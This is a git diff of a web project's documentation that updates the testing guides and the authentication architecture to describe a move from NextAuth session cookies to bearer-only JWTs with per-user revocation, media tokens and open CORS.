@@ -610,7 +612,7 @@ it('renders page title', () => {
 import Page from '../page'; // The wrapper
 
 it('renders page', () => {
-  // Need to mock: useQuery, useTheme, useTranslations, etc.
+  // Need to mock: the SDK session/client, useTheme, useTranslations, etc.
   vi.mock('...'); // Many mocks needed!
   renderWithProviders(<Page />); // Complex test setup
 });
@@ -634,7 +636,7 @@ it('renders page', () => {
 - Auth components: `SignUpForm`, `AuthErrorDisplay`, `WelcomePage`
 - Annotation components: All annotation UI and popups
 - Hooks: `useObservable`, `useResourceContent`, `useMediaToken`, `useToast`, etc.
-- Utilities: Validation, query keys, annotation registry
+- Utilities: Validation, annotation registry
 
 **apps/frontend:**
 - App shell & routing: providers, AuthShell, route guards

--- a/apps/frontend/docs/TESTING.md
+++ b/apps/frontend/docs/TESTING.md
@@ -281,20 +281,23 @@ expect(mockFn).toHaveBeenCalledWith(expectedArgs);
 ### Hook Testing Example
 
 ```typescript
-// Mock useKnowledgeBaseSession via @semiont/react-ui and assert downstream behavior
-import { renderHook } from '@testing-library/react';
+// Mock useSemiont to return a browser with a fake active session, then assert
+// downstream behavior. (For richer cases, inject a real SemiontBrowser via
+// `<SemiontProvider browser={…}>` — see src/test-utils.tsx.)
+import { render } from '@testing-library/react';
 import { vi } from 'vitest';
-import { useKnowledgeBaseSession } from '@semiont/react-ui';
+import { BehaviorSubject } from 'rxjs';
 
 vi.mock('@semiont/react-ui', async () => {
   const actual = await vi.importActual<typeof import('@semiont/react-ui')>('@semiont/react-ui');
+  const user$ = new BehaviorSubject({ isAdmin: true, name: 'Alice' });
+  const activeSession$ = new BehaviorSubject({ user$, client: {}, kb: { id: 'kb-1' } });
   return {
     ...actual,
-    useKnowledgeBaseSession: () => ({
-      ...actual.defaultMockKnowledgeBaseSession ?? {},
-      isAuthenticated: true,
-      isAdmin: true,
-      displayName: 'Alice',
+    useSemiont: () => ({
+      activeSession$,
+      activeKbId$: new BehaviorSubject('kb-1'),
+      activeSignals$: new BehaviorSubject(null),
     }),
   };
 });

--- a/apps/frontend/docs/TESTING.md
+++ b/apps/frontend/docs/TESTING.md
@@ -37,9 +37,8 @@ Testing in the Semiont frontend is split between two packages following the comp
 │         apps/frontend               │
 │         Test Coverage:              │
 │                                     │
-│  • Next.js page wrappers            │
-│  • API routes                       │
-│  • NextAuth integration             │
+│  • App shell, routing, providers    │
+│  • AuthShell & route guards         │
 │  • App-specific components          │
 │  • Integration flows                │
 └─────────────┬───────────────────────┘
@@ -66,12 +65,10 @@ Testing in the Semiont frontend is split between two packages following the comp
 - Provider logic
 - UI components (Button, Card, ResourceViewer, etc.)
 
-**In apps/frontend** (Next.js specific):
-- Page wrappers that use Next.js hooks
-- API route handlers
-- NextAuth configuration
-- Integration flows across pages
-- App-specific components
+**In apps/frontend** (Vite SPA specific):
+- App shell, routing, and provider composition (`providers.tsx`, `AuthShell`)
+- Integration flows across pages (e.g. the sign-up flow)
+- App-specific components (Home, About, CookieBanner, etc.)
 
 ## Running Tests
 
@@ -174,20 +171,22 @@ src/
 - Component interactions across boundaries
 - End-to-end feature workflows
 
-### API Tests
+### App Shell & Routing Tests
+
+The SPA has no server and no API routes; the non-component frontend tests
+cover the app shell, routing, and provider composition:
 
 ```
 src/
-└── app/
-    ├── auth/[...nextauth]/__tests__/     # NextAuth.js route tests
-    ├── cookies/consent/__tests__/        # Cookie consent API tests
-    └── cookies/export/__tests__/         # Data export API tests
+├── __tests__/route-auth-shell.test.tsx   # route guards / AuthShell mounting
+├── app/__tests__/providers.test.tsx      # root provider composition
+└── contexts/__tests__/AuthShell.test.tsx # protected boundary + modals
 ```
 
 **What to test**:
-- Next.js API route handlers
-- Request/response validation
-- Error handling
+- Provider composition and the `SemiontProvider` / `AuthShell` boundary
+- Route guards and protected-layout mounting
+- Auth-failure modal surfacing and error handling
 
 ### Security Tests
 
@@ -499,11 +498,11 @@ export interface ResourceViewerProps {
 }
 
 export function ResourceViewer(props: ResourceViewerProps) {
-  // Uses injected providers for data
-  const resources = useResources(); // From ApiClientProvider
+  // Reads the active session's client from context (SemiontProvider)
+  const client = useObservable(useSemiont().activeSession$)?.client;
   const { t } = useTranslations(); // From TranslationProvider
 
-  const { data, isLoading } = resources.get.useQuery(props.resourceId);
+  const data = useObservable(client?.browse.resource(props.resourceId));
 
   // Pure component logic - all framework-agnostic
   return (
@@ -514,12 +513,14 @@ export function ResourceViewer(props: ResourceViewerProps) {
   );
 }
 
-// ✅ Page Wrapper (apps/frontend/app/[locale]/resources/[id]/page.tsx)
+// ✅ Route component (a React Router v7 route element)
+import { useParams } from 'react-router-dom';
 import { ResourceViewer } from '@semiont/react-ui';
 
-export default function ResourcePage({ params }: { params: { id: string } }) {
-  // Thin wrapper - just passes params
-  return <ResourceViewer resourceId={params.id} />;
+export function ResourcePage() {
+  // Thin wrapper - reads the route param and passes it through
+  const { id } = useParams();
+  return <ResourceViewer resourceId={id!} />;
 }
 ```
 
@@ -629,14 +630,13 @@ it('renders page', () => {
 - Resource components: `ResourceViewer`, `AnnotateView`, `BrowseView`
 - Auth components: `SignUpForm`, `AuthErrorDisplay`, `WelcomePage`
 - Annotation components: All annotation UI and popups
-- Hooks: `useResources`, `useAnnotations`, `useToast`, etc.
+- Hooks: `useObservable`, `useResourceContent`, `useMediaToken`, `useToast`, etc.
 - Utilities: Validation, query keys, annotation registry
 
 **apps/frontend:**
-- Page wrappers: Thin Next.js page components
-- Integration tests: Multi-step user flows
-- API routes: NextAuth, cookie consent, data export
-- App-specific components: Home, About, Privacy pages
+- App shell & routing: providers, AuthShell, route guards
+- Integration tests: Multi-step user flows (e.g. sign-up)
+- App-specific components: Home, About, Privacy, CookieBanner
 
 ### Reference Examples
 
@@ -648,7 +648,7 @@ npm test
 
 # Example test locations
 packages/react-ui/src/components/__tests__/Button.test.tsx
-packages/react-ui/src/hooks/__tests__/useResources.test.tsx
+packages/react-ui/src/hooks/__tests__/useResourceContent.test.tsx
 packages/react-ui/src/features/auth/__tests__/SignUpForm.test.tsx
 ```
 
@@ -660,10 +660,10 @@ npm test
 
 # Example test locations
 src/app/[locale]/auth/__tests__/signup-flow.integration.test.tsx
-src/app/api/auth/[...nextauth]/__tests__/route.test.ts
+src/contexts/__tests__/AuthShell.integration.test.tsx
 ```
 
-**Key Testing Pattern**: Business logic lives in @semiont/react-ui and is thoroughly tested there. The frontend only tests Next.js-specific integration and thin wrapper components.
+**Key Testing Pattern**: Business logic lives in @semiont/react-ui and is thoroughly tested there. The frontend tests app-shell/routing/provider integration and app-specific components.
 
 ## Future Testing Enhancements
 

--- a/docs/protocol/RBAC.md
+++ b/docs/protocol/RBAC.md
@@ -43,7 +43,7 @@ Authentication is handled through OAuth providers configured in the environment:
 - GitHub OAuth
 - GitLab OAuth
 
-Sessions use JWT tokens: 7-day access tokens, 30-day refresh tokens.
+Sessions use bearer JWTs: 10-minute access tokens, 30-day refresh tokens, revocable per-user via a `tokenVersion` epoch (logout revokes all of a user's tokens).
 
 ### Development
 

--- a/docs/protocol/TRANSPORT-CONTRACT.md
+++ b/docs/protocol/TRANSPORT-CONTRACT.md
@@ -39,7 +39,7 @@ interface ITransport {
 
   // Typed wire methods: auth, admin, exchange, system
   authenticatePassword, authenticateGoogle, refreshAccessToken,
-  logout, acceptTerms, getCurrentUser, generateMcpToken, getMediaToken,
+  logout, acceptTerms, getCurrentUser, getMediaToken,
   listUsers, getUserStats, updateUser, getOAuthConfig,
   backupKnowledgeBase, restoreKnowledgeBase,
   exportKnowledgeBase, importKnowledgeBase,

--- a/docs/system/administration/AUTHENTICATION.md
+++ b/docs/system/administration/AUTHENTICATION.md
@@ -1,31 +1,27 @@
 # Authentication Architecture
 
-Semiont implements a **router-level authentication** model using OAuth 2.0 and JWT tokens with special support for MCP (Model Context Protocol) clients.
+Semiont uses **bearer-only** authentication: every request authenticates with an `Authorization: Bearer` JWT (or, for media, a short-lived `?token=`). There are **no session cookies** — the backend carries no ambient credentials, which is what lets CORS be fully open (`*`) and a KB be hosted on the public internet.
 
 **Related Documentation:**
 - [Architecture Overview](../README.md) - Overall application architecture
+- [Security](./SECURITY.md) - CORS posture, secret management, hardening checklist
 - [AWS Deployment](../platforms/AWS.md) - AWS Secrets Manager configuration
 - [Configuration Guide](./CONFIGURATION.md) - Environment and secret management
 
 ## Overview
 
-The authentication system has three main components:
+Three pieces make up the auth system:
 
-1. **Frontend Authentication**: NextAuth.js with Google OAuth 2.0
-2. **Backend Authentication**: JWT token validation with router-level API protection
-3. **MCP Client Support**: Browser-based OAuth flow with long-lived refresh tokens
+1. **Sign-in** — the browser SPA (Vite + React) or any SDK consumer exchanges credentials (password or Google OAuth) for a JWT, returned **in the response body**. There is no auth server in front of the API and no NextAuth — the SPA is a pure client.
+2. **Bearer validation** — the backend validates the JWT on every protected request (router-level `authMiddleware`), loading the user from the database.
+3. **Revocable sessions** — a per-user revocation epoch (`User.tokenVersion`) makes **logout server-side, immediate, and all-devices**.
 
 ## Authentication Flow Diagram
 
 ```mermaid
 graph TB
-    subgraph "Browser"
-        User[User]
-        Session[Session Cookie<br/>with JWT]
-    end
-
-    subgraph "Frontend Server"
-        NextAuth[NextAuth.js<br/>OAuth Handler]
+    subgraph "Client (SPA / SDK / CLI)"
+        App[App holds token in memory]
     end
 
     subgraph "OAuth Provider"
@@ -33,215 +29,112 @@ graph TB
     end
 
     subgraph "Backend API"
-        TokenGen[Token Generator]
-        JWT[JWT Validator]
+        TokenGen[Token endpoints]
+        MW[authMiddleware<br/>Bearer + ?token= validator]
         API[Protected APIs]
+        Users[(Users table<br/>tokenVersion epoch)]
     end
 
-    subgraph "Database"
-        Users[(Users Table)]
-    end
+    App -->|"1. POST /api/tokens/password<br/>or /api/tokens/google"| TokenGen
+    Google -.->|OAuth credential| App
+    TokenGen -->|"2. JWT in body (10-min access + 30-day refresh)"| App
+    TokenGen --> Users
 
-    %% OAuth flow (server-side only)
-    User -.->|1. Login| NextAuth
-    NextAuth -.->|2. OAuth Flow| Google
-    Google -.->|3. OAuth Token| NextAuth
-    NextAuth -.->|4. Exchange Token| TokenGen
-    TokenGen -.->|5. JWT| NextAuth
-    TokenGen -.->|6. Create/Update User| Users
-    NextAuth -.->|7. Store JWT| Session
-
-    %% API calls (client-side from browser)
-    User -->|8. API Request + JWT| JWT
-    JWT -->|9. Validate| API
-    API -->|10. Response| User
-
-    subgraph "MCP Client Flow"
-        MCP[MCP Client]
-        MCP -.->|Browser Auth| NextAuth
-        NextAuth -.->|Generate Refresh Token| TokenGen
-        TokenGen -.->|30-day Refresh Token| MCP
-    end
+    App -->|"3. Authorization: Bearer <access>"| MW
+    MW -->|"validate sig + tokenVersion + load user"| Users
+    MW --> API
+    App -->|"4. SDK Session: POST /api/tokens/refresh<br/>(30-day refresh → new 10-min access)"| TokenGen
+    App -->|"5. POST /api/users/logout → bump tokenVersion (204)"| Users
 ```
 
 ## Authentication Model
 
-### Core Principles
+### Core principles
 
-- **Router-Level Protection**: Each router applies authentication middleware to its protected routes
-- **Explicit Protection**: Routes must explicitly use `authMiddleware` for authentication
-- **JWT Bearer Tokens**: Stateless authentication for API requests
-- **OAuth Integration**: Google OAuth 2.0 for user authentication
-- **Domain Restrictions**: Email domain-based access control
+- **Bearer-only**: authentication is an `Authorization: Bearer <jwt>` header. JS attaches it explicitly — it is **not** an ambient credential, so the API works with CORS `origin: '*'` and no `Access-Control-Allow-Credentials` (see [Security](./SECURITY.md)).
+- **Router-level protection**: each router applies `authMiddleware` to its protected routes; protection is explicit.
+- **Stateless access, per-request user load**: the access token is a stateless JWT, but the middleware loads the user every request — which is what makes revocation (below) ~free and immediate.
+- **Revocable sessions**: logout is meaningful — it revokes server-side across all devices, not just a local cookie delete.
+- **Domain restrictions**: email-domain-based access control (`ALLOWED_EMAIL_DOMAINS`).
 
-### Authentication Flow
+### Token lifecycle
 
-**OAuth Login** (server-side, happens once):
-```
-1. Browser → Frontend Server (NextAuth.js) → Google OAuth
-2. Google returns OAuth token → Frontend Server
-3. Frontend Server → Backend (exchange OAuth token)
-4. Backend validates with Google, generates JWT
-5. Frontend Server stores JWT in session cookie
-```
+| Token | TTL | Carried as | Purpose |
+|---|---|---|---|
+| **Access** | **10 minutes** | `Authorization: Bearer` | Per-request API auth; validated on every protected route. |
+| **Refresh** | **30 days** | request body to `/api/tokens/refresh` | The SDK **Session** silently mints new access tokens from it. |
+| **Agent** | 24 hours | `Authorization: Bearer` | Software-agent identity for background workers (`/api/tokens/agent`). |
+| **Media** | 5 minutes | `?token=` query param | Resource-scoped token for `GET /api/resources/:id` (images, PDFs) where a header can't be set. |
 
-**API Calls** (client-side, every request):
-```
-Browser → Backend (with JWT from session) → Validate & Respond
-```
+Every JWT carries the user's **`tokenVersion`** at mint time (a required claim — there is no compatibility default). Both access-validation and `/api/tokens/refresh` reject when `payload.tokenVersion !== user.tokenVersion`.
 
-**Key Architecture Points**:
-- **Frontend Server** only handles OAuth callback (not a proxy for API calls)
-- **Browser** calls Backend API directly using `SERVER_API_URL`
-- **JWT token** stored in NextAuth session cookie, included in API requests
-- **Backend** is public-facing (accessible from browser)
+### Revocation — what logout does
+
+`POST /api/users/logout` increments `User.tokenVersion` and returns **`204`**. That single bump:
+
+- **Kills the 30-day refresh token** — `/refresh` now rejects it, so no new access tokens can be minted.
+- **Rejects live access tokens** on their next request — the per-request user load makes the epoch check ~free.
+
+So logout is **immediate and all-devices**. (Per-device logout would need a per-session table; deliberately deferred — the epoch doesn't preclude adding it later.)
+
+The counter is a **logical clock**, chosen over a wall-clock `tokensValidAfter` timestamp on purpose: Semiont is a global, multi-instance system, so comparing a mint-time `iat` (stamped by one instance) against a logout timestamp (stamped by another) would be unsound under clock skew. Exact integer equality is clock-independent. (Honest caveat shared by any DB-backed scheme: revocation is only as instant as cross-region replication of the `User` row.)
 
 ## Endpoint Protection
 
-### Public Endpoints
+### Public endpoints (no auth)
 
-Only these endpoints are accessible without authentication:
+- `GET /api/health` — health check
+- `GET /api` — API documentation
+- `POST /api/tokens/password` — password sign-in (returns JWT in body)
+- `POST /api/tokens/google` — Google OAuth sign-in (returns JWT in body)
+- `POST /api/tokens/refresh` — refresh-token exchange (validates `tokenVersion` + `isActive`)
+- `POST /api/tokens/agent` — software-agent token mint
 
-- `GET /api/health` - Health check for monitoring
-- `GET /api` - API documentation
-- `POST /api/tokens/google` - Google OAuth authentication
-- `POST /api/tokens/password` - Password authentication
-- `POST /api/tokens/refresh` - Refresh token exchange
+### Protected endpoints (`authMiddleware`)
 
-### Protected Endpoints
+Require a valid `Authorization: Bearer` access token (signature, payload schema, expiry, user exists + `isActive`, matching `tokenVersion`, allowed domain). Examples: `GET /api/users/me`, `POST /api/tokens/media`, `POST /api/users/accept-terms`, `POST /api/users/logout`, and all `/api/resources/*`.
 
-Protected API routes (those using `authMiddleware`) require:
-
-- Valid JWT token in Authorization header
-- Token signature verification
-- Token expiration validation
-- User existence verification
-
-**Example Request**:
 ```http
-GET /api/documents HTTP/1.1
+GET /api/users/me HTTP/1.1
 Host: api.semiont.com
 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
 ```
 
-### Admin Endpoints
+`GET /api/users/me` returns the token in its body — the bearer-in-body path the SDK relies on (no cookie to read).
 
-Admin endpoints require additional authorization:
+### Media tokens (`?token=`)
 
-- Valid JWT token (authentication)
-- `isAdmin: true` user attribute (authorization)
-- Returns 403 Forbidden for non-admin users
+`GET /api/resources/:id` additionally accepts a short-lived, resource-scoped **media token** as `?token=` (minted by `POST /api/tokens/media`), checked **before** the `Authorization` header. This is the path `<img>` / PDF / media use, where a request header can't be set. It is the *only* `?token=` path — it does not apply to the bare `/resources/:id` IRI.
 
-**Example Admin Routes**:
-- `DELETE /api/users/:id`
-- `POST /api/admin/settings`
+### Bare-IRI navigation → 401
 
-## MCP Authentication
+A raw browser navigation to a protected resource (e.g. pasting a `/resources/:id` IRI) is unauthenticated and returns **401** — there is no cookie and no login redirect. The missing-token 401 carries an actionable `hint`:
 
-Special authentication support for Model Context Protocol (MCP) clients that need programmatic API access.
-
-### Frontend MCP Bridge
-
-The frontend provides `/auth/mcp-setup` endpoint that:
-
-- Handles browser-based OAuth flow for MCP clients
-- Uses NextAuth session cookies for authentication
-- Calls backend to generate long-lived refresh tokens
-- Redirects to MCP client callback with token
-
-**Usage**:
-```bash
-# MCP client opens browser to:
-https://semiont.com/auth/mcp-setup?callback=http://localhost:8080/callback
-```
-
-### Backend Token Management
-
-Two endpoints manage MCP tokens:
-
-#### Generate Refresh Token
-
-```http
-POST /api/tokens/mcp-generate
-Authorization: Bearer <session-token>
-
-Response:
+```json
 {
-  "refreshToken": "...",
-  "expiresIn": 2592000  // 30 days
+  "error": "Unauthorized",
+  "hint": "Authentication required: send an `Authorization: Bearer <token>` header. A raw browser navigation to a protected resource is unauthenticated."
 }
 ```
 
-#### Exchange Refresh Token
+The IRI is meant for SDK / `Bearer` dereference; the `hint` keeps a forgotten header from being misdiagnosed as the old CORS mystery.
 
-```http
-POST /api/tokens/refresh
-Content-Type: application/json
+### Admin endpoints
 
-{
-  "refreshToken": "..."
-}
-
-Response:
-{
-  "accessToken": "...",
-  "expiresIn": 3600  // 1 hour
-}
-```
-
-### Token Lifecycle
-
-1. **Initial Setup**: MCP client opens browser to `/auth/mcp-setup?callback=<url>`
-2. **User Authentication**: Frontend authenticates user via NextAuth (Google OAuth)
-3. **Token Generation**: Frontend calls backend's `/api/tokens/mcp-generate`
-4. **Refresh Token Issued**: Backend generates 30-day refresh token
-5. **Callback**: Frontend redirects to callback URL with refresh token
-6. **Local Storage**: MCP client stores refresh token locally
-7. **Token Exchange**: MCP client exchanges refresh token for 1-hour access tokens as needed
-
-**Example MCP Client Usage**:
-```typescript
-// Initial setup - done once
-const refreshToken = await mcpClient.authenticate({
-  authUrl: 'https://semiont.com/auth/mcp-setup',
-  callbackUrl: 'http://localhost:8080/callback'
-});
-
-// Store refresh token
-await mcpClient.storeToken(refreshToken);
-
-// Exchange for access token - done hourly
-const accessToken = await mcpClient.refreshAccessToken(refreshToken);
-
-// Use access token
-const response = await fetch('https://api.semiont.com/api/documents', {
-  headers: {
-    'Authorization': `Bearer ${accessToken}`
-  }
-});
-```
+Admin routes require a valid token **plus** `isAdmin: true`, returning `403` otherwise (e.g. `PATCH /api/admin/users/:id`).
 
 ## JWT Security
 
-### Token Validation Layers
+### Validation layers (per request)
 
-1. **Signature Verification**: Validates token hasn't been tampered with using HMAC SHA256
-2. **Payload Structure**: Runtime validation of token structure with Zod schemas
-3. **Expiration Checking**: Ensures token hasn't expired (7-day default)
-4. **User Verification**: Confirms user exists and is active in database
-5. **Domain Validation**: Checks email domain against allowed list
+1. **Signature** — HMAC-SHA256 against `JWT_SECRET`.
+2. **Payload structure** — runtime Zod validation; `tokenVersion` is a **required** claim (a token minted before the field fails `safeParse` → re-login, the correct revoke-on-rollout posture).
+3. **Expiration** — access tokens are short-lived (10 minutes).
+4. **User + epoch** — the user is loaded from the DB; rejected if absent, not `isActive`, or `payload.tokenVersion !== user.tokenVersion` (revoked).
+5. **Domain** — email domain checked against the allowed list.
 
-### Security Features
+### Access token payload
 
-- **Short-lived Access Tokens**: 7-day expiration by default
-- **Long-lived Refresh Tokens**: 30-day expiration for MCP clients only
-- **Secure Secret Management**: JWT secret stored in secure secret storage
-- **Domain Restrictions**: Email domain-based access control
-- **Router-Level Middleware**: Authentication middleware applied at router level
-
-### Token Structure
-
-**Access Token Payload**:
 ```json
 {
   "userId": "user-123",
@@ -250,249 +143,104 @@ const response = await fetch('https://api.semiont.com/api/documents', {
   "domain": "example.com",
   "provider": "google",
   "isAdmin": false,
+  "tokenVersion": 0,
   "iat": 1698765432,
-  "exp": 1699370232
-}
-```
-
-**Refresh Token Payload**:
-```json
-{
-  "userId": "user-123",
-  "email": "user@example.com",
-  "domain": "example.com",
-  "provider": "google",
-  "isAdmin": false,
-  "type": "refresh",
-  "iat": 1698765432,
-  "exp": 1701357432
+  "exp": 1698766032
 }
 ```
 
 ## Implementation Details
 
-### Frontend Authentication (NextAuth.js)
+### Bearer validation (`apps/backend/src/middleware/auth.ts`)
 
-**Configuration** (`apps/frontend/src/auth.ts`):
-```typescript
-import NextAuth from 'next-auth';
-import Google from 'next-auth/providers/google';
+The middleware accepts a media token via `?token=` for `GET /api/resources/:id`, otherwise an `Authorization: Bearer` header; a missing token returns the actionable 401 above. On a valid token it loads the principal (`OAuthService.getPrincipalFromToken` → `prisma.user.findUnique`), enforcing the `isActive` and `tokenVersion` checks, and sets `c.get('user')`.
 
-export const { handlers, auth, signIn, signOut } = NextAuth({
-  providers: [
-    Google({
-      clientId: process.env.GOOGLE_CLIENT_ID,
-      clientSecret: process.env.GOOGLE_CLIENT_SECRET,
-    }),
-  ],
-  callbacks: {
-    async signIn({ user, account, profile }) {
-      // Domain restriction
-      if (!user.email?.endsWith('@allowed-domain.com')) {
-        return false;
-      }
-      return true;
-    },
-  },
-});
-```
+### Route protection (`apps/backend/src/routes/resources/shared.ts`)
 
-### Backend Authentication Middleware
-
-**JWT Validation** (`apps/backend/src/middleware/auth.ts`):
-```typescript
-import { Context, Next } from 'hono';
-import { OAuthService } from '../auth/oauth';
-import { accessToken } from '@semiont/core';
-
-export const authMiddleware = async (c: Context, next: Next): Promise<Response | void> => {
-  const logger = c.get('logger');
-  const authHeader = c.req.header('Authorization');
-
-  if (!authHeader || !authHeader.startsWith('Bearer ')) {
-    logger.warn('Authentication failed: Missing Authorization header', {
-      type: 'auth_failed',
-      reason: 'missing_header',
-      path: c.req.path,
-      method: c.req.method
-    });
-    return c.json({ error: 'Unauthorized' }, 401);
-  }
-
-  const tokenStr = authHeader.substring(7).trim();
-
-  if (!tokenStr) {
-    logger.warn('Authentication failed: Empty token', {
-      type: 'auth_failed',
-      reason: 'empty_token'
-    });
-    return c.json({ error: 'Unauthorized' }, 401);
-  }
-
-  try {
-    const user = await OAuthService.getUserFromToken(accessToken(tokenStr));
-    c.set('user', user);
-
-    logger.debug('Authentication successful', {
-      type: 'auth_success',
-      userId: user.id,
-      email: user.email
-    });
-
-    await next();
-  } catch (error) {
-    logger.warn('Authentication failed: Invalid token', {
-      type: 'auth_failed',
-      reason: 'invalid_token',
-      error: error instanceof Error ? error.message : String(error)
-    });
-    return c.json({ error: 'Invalid token' }, 401);
-  }
-};
-```
-
-### Route Protection
-
-**Router-Level Middleware** (`apps/backend/src/routes/resources/shared.ts`):
 ```typescript
 import { authMiddleware } from '../../middleware/auth';
-import { Hono } from 'hono';
 
 export function initResourcesRouter(router: Hono) {
-  // Apply authentication to all resource routes
   router.use('/api/resources/*', authMiddleware);
-  router.use('/resources/*', authMiddleware); // W3C URI endpoints also require auth
+  router.use('/resources/*', authMiddleware); // W3C IRI endpoints also require auth
 }
 ```
 
-**Route-Specific Protection** (`apps/backend/src/routes/auth.ts`):
+### Logout (`apps/backend/src/routes/auth.ts`)
+
 ```typescript
-import { authMiddleware } from '../middleware/auth';
-import { Hono } from 'hono';
-import type { User } from '@prisma/client';
-
-export const authRouter = new Hono<{ Variables: { user: User } }>();
-
-// Public route - no middleware
-authRouter.post('/api/tokens/password', async (c) => {
-  // Handle password authentication
-  return c.json({ token: '...' });
-});
-
-// Protected route - requires authentication
-authRouter.get('/api/users/me', authMiddleware, async (c) => {
+authRouter.post('/api/users/logout', authMiddleware, async (c) => {
   const user = c.get('user');
-  // user.id, user.email, user.isAdmin available
-
-  return c.json({
-    id: user.id,
-    email: user.email,
-    name: user.name,
-    domain: user.domain,
-    provider: user.provider,
-    isAdmin: user.isAdmin
+  await prisma.user.update({
+    where: { id: user.id },
+    data: { tokenVersion: { increment: 1 } }, // revoke all of this user's tokens
   });
-});
-
-// Admin-only route
-authRouter.patch('/api/admin/users/:id', authMiddleware, async (c) => {
-  const user = c.get('user');
-
-  if (!user.isAdmin) {
-    return c.json({ error: 'Forbidden' }, 403);
-  }
-
-  const userId = c.req.param('id');
-  // Update user logic here
-  return c.json({ success: true });
+  return c.body(null, 204);
 });
 ```
 
 ## Environment Configuration
 
-### Required Environment Variables
+### Required environment variables (backend)
 
-**Frontend** (`.env.local`):
-```bash
-GOOGLE_CLIENT_ID=your-client-id.apps.googleusercontent.com
-GOOGLE_CLIENT_SECRET=your-client-secret
-NEXTAUTH_URL=http://localhost:3000
-NEXTAUTH_SECRET=your-nextauth-secret
-```
-
-**Backend** (`.env`):
 ```bash
 JWT_SECRET=your-jwt-secret
 DATABASE_URL=postgresql://user:pass@localhost:5432/semiont
 ALLOWED_EMAIL_DOMAINS=example.com,company.com
+GOOGLE_CLIENT_ID=your-client-id.apps.googleusercontent.com   # for /api/tokens/google
+GOOGLE_CLIENT_SECRET=your-client-secret
 ```
 
-### Secret Management
+There are **no** `NEXTAUTH_*` variables — the frontend is a pure SPA with no auth server.
 
-For production deployment:
-- Store secrets in secure secret storage (e.g., AWS Secrets Manager)
-- Never commit secrets to Git
-- Use different secrets per environment
-- Rotate secrets regularly
+### Secret management
 
-See [Configuration Guide](./CONFIGURATION.md) for detailed secret management.
+Store `JWT_SECRET` and OAuth credentials in secure secret storage (e.g. AWS Secrets Manager); never commit them; use different secrets per environment; rotate regularly. See [Configuration Guide](./CONFIGURATION.md).
 
 ## Security Best Practices
 
-### Token Management
+### Token handling
 
-1. **Never store tokens in localStorage**: Use secure httpOnly cookies for web apps
-2. **Short expiration times**: Access tokens expire in 7 days, refresh tokens in 30 days
-3. **Secure transmission**: Always use HTTPS in production
-4. **Token rotation**: Refresh tokens should be rotated on use (future enhancement)
+1. **Bearer tokens live in JS memory**, not cookies — the SDK holds them and attaches them explicitly. There is no httpOnly cookie. The XSS trade-off (a 30-day refresh token in JS) is mitigated by **revocability**: logout bumps `tokenVersion` and instantly invalidates it.
+2. **Short access TTL (10 min)** limits the window of a leaked access token; revocation is at the `/refresh` boundary and on every request.
+3. **Always use HTTPS in production.**
+4. **Open CORS is intentional and safe here** because no credentials are carried (see [Security](./SECURITY.md)). Never re-introduce credentialed CORS or origin-reflection.
 
-### OAuth Configuration
+### OAuth
 
-1. **Restrict redirect URIs**: Only allow known callback URLs
-2. **Domain restrictions**: Limit access to specific email domains
-3. **Verify email**: Always verify email is confirmed by OAuth provider
-4. **Scope minimization**: Only request necessary OAuth scopes
+1. Restrict redirect URIs to known callbacks. 2. Limit access by email domain. 3. Verify the email is confirmed by the provider. 4. Request minimal scopes.
 
-### API Security
+### API
 
-1. **Explicit protection**: Routes must explicitly apply authentication middleware
-2. **Rate limiting**: Implement rate limiting per IP/user (see [AWS.md](../platforms/AWS.md) for WAF configuration)
-3. **Input validation**: Validate all inputs with Zod schemas
-4. **Audit logging**: Log all authentication events
+1. Routes explicitly apply `authMiddleware`. 2. Rate-limit per IP/user (see [AWS.md](../platforms/AWS.md) for WAF). 3. Validate inputs with Zod. 4. Log auth events; the startup log records the bearer-only / open-CORS posture.
+
+> **MCP programmatic access** — the old browser-mediated MCP token routes (`/api/tokens/mcp-setup`, `/api/tokens/mcp-generate`) were removed when auth moved bearer-only; MCP provisioning is being re-architected (each backend KB owns its own grant handshake). MCP `login` is not available until that rebuild lands.
 
 ## Troubleshooting
 
-### Common Issues
+**"Unauthorized" (401)**
+- Confirm the `Authorization: Bearer <token>` header is present and well-formed.
+- A raw browser navigation to a protected resource is unauthenticated by design — use the SDK or a media `?token=`.
+- The token may be expired (10-minute access TTL) — let the SDK Session refresh, or re-authenticate.
+- After a **logout** anywhere, *all* of that user's existing tokens are revoked (the `tokenVersion` epoch advanced) — re-authenticate.
 
-**"Unauthorized" Error**:
-- Check Authorization header is present and correctly formatted
-- Verify JWT secret matches between token generation and validation
-- Ensure token hasn't expired
+**Refresh fails (session ends)**
+- A `401` from `/api/tokens/refresh` means the refresh token was revoked (logout) or the user is inactive — the SDK Session clears and stops retrying. Re-authenticate.
 
-**OAuth Callback Fails**:
-- Verify redirect URI matches Google OAuth configuration
-- Check NEXTAUTH_URL environment variable is correct
-- Ensure Google Client ID/Secret are valid
+**OAuth callback fails**
+- Verify the redirect URI matches the Google OAuth configuration and the Google client ID/secret are valid.
 
-**MCP Token Exchange Fails**:
-- Refresh token may have expired (30-day limit)
-- Verify refresh token is correctly stored and transmitted
-- Check backend `/api/tokens/refresh` endpoint is accessible
-
-**Domain Restriction Blocks Login**:
-- Verify user email domain is in ALLOWED_EMAIL_DOMAINS
-- Check domain comparison logic in signIn callback
-- Ensure email is verified by OAuth provider
+**Domain restriction blocks login**
+- Confirm the user's email domain is in `ALLOWED_EMAIL_DOMAINS` and the email is verified by the provider.
 
 ## Related Documentation
 
 - [Architecture Overview](../README.md) - Application architecture and service communication
+- [Security](./SECURITY.md) - CORS posture, secrets, hardening
 - [AWS Deployment](../platforms/AWS.md) - AWS Secrets Manager and security groups
-- [Configuration Guide](./CONFIGURATION.md) - Environment variables and secret management
-- [Database Management](./DATABASE.md) - User table schema and Prisma setup
+- [Database Management](./DATABASE.md) - User table schema (incl. `tokenVersion`) and Prisma setup
 
 ---
 
-**Document Version**: 1.0
-**Last Updated**: 2025-10-23
-**Authentication**: OAuth 2.0 + JWT with MCP support
+**Authentication**: bearer-only JWT (10-min access + 30-day refresh) with a per-user `tokenVersion` revocation epoch; `?token=` media tokens; open CORS.
+**Last Updated**: 2026-06-20

--- a/docs/system/administration/CONFIGURATION.md
+++ b/docs/system/administration/CONFIGURATION.md
@@ -40,7 +40,6 @@ platform = "posix"
 port = 3001
 publicURL = "http://localhost:3001"
 frontendURL = "http://localhost:3000"
-corsOrigin = "http://localhost:3000"
 
 [environments.local.site]
 domain = "localhost"

--- a/docs/system/administration/IMAGES.md
+++ b/docs/system/administration/IMAGES.md
